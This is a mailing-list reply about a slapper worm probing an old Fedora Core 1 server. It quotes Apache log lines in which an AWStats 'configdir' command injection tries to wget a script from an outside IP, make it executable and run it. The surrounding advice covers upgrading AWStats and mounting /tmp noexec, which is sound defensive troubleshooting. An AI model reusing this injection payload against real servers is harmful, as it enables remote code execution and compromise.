Re: slapper worm

["Michael Mansour" <mic npgx com au>]

Hi Kelson,

> Michael Mansour wrote:
> > 220.135.223.35 - - [23/Jan/2006:08:33:02 +1100] "GET
> > /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft
> >
mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|
> >  HTTP/1.1"
> >  403 344 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
> > 220.135.223.35 - - [23/Jan/2006:08:33:03 +1100] "GET
> > /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ft
> >
mp%3bwget%20194%2e102%2e194%2e115%2fscripz%3bchmod%20%2bx%20scripz%3b%2e%2fscripz;echo%20YYY;echo|
> >  HTTP/1.1"
> >  404 340 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
> ...
> > Are there any updates FL can do to any of the packages to fix/block
> > slapper from an FC1 machine?
> 
> You might also want to make sure you're using a current version of
> AWStats.  IIRC this flaw was fixed in either 6.3 or 6.4, and the current
> version is 6.5.

Yeah, I run awstats 6.5 on that system.

> (If you don't have awstats.pl on your system, then these lines are 
> just probes and aren't relevant to your problem.)
> 
> More generally, I read advice somewhere that mounting /tmp with the 
> "noexec" option (and making any other temp directories symbolic 
> links to that one) can make this type of attack much more difficult.

Definately noted as one of the measures to stop this type of attack, but for
this particular server, /tmp is not a mounted filesystem but part of /, so I
can't really do that without re-partitioning the disk and creating a dedicated
/tmp.

Thanks.

Michael.